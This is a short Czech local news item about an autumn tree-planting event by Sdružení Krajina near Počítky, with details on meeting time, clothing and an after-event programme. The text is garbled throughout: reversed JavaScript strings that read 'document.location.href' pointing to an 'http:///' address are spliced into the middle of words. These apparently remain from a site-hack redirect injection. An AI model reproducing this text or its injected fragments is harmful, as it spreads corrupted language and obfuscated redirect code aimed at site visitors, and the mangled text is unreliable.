Rainbow page separator

Při tradiční výsadbě u Počítek přibudou v krajině další stromy

Neděle, 31. října 2021

Počítky / Na sobotu 6. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu se mohou těšit příznivci tradičního podzimního sázení listnatých stromů pod tak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovkou Sdružení Krajina se sídlem v Počítkách. Ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát se dobrovolníci sejdou o půl desáté dopoledne nad Počítkami na okraji pastviny u odbočky k lokalitě Čtvrtě. Tam si současně mohou odstavit svá auta, než se společně s organizá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory akce vydají na mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to sázení. „Akce se koná za každého počasí, po zkušenostech z předchozích let ovšem doporučujeme teplé pracovní oblečení a pořádné boty. Stromky, výsadbový materiál, nářadí, teplý čaj a občerstvení bude zajištěno. Vítáme příspěvky v podobě pekařských výrobků z domácí kuchyně, abychom se při práci mohli posilnit,“ informovala Darina Coufalová ze Sdružení Krajina.
Po práci se všichni zúčastnění mají možnost přesunout do zázemí Sdružení Krajina, jímž je chalupa v Počítkách, kde bude připraveno nejenom občerstvení, ale i doprovodný program v podobě pěveckého vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení novoměstského dámského uskupení ZEVL a tvořivé dílny pro malé i velké.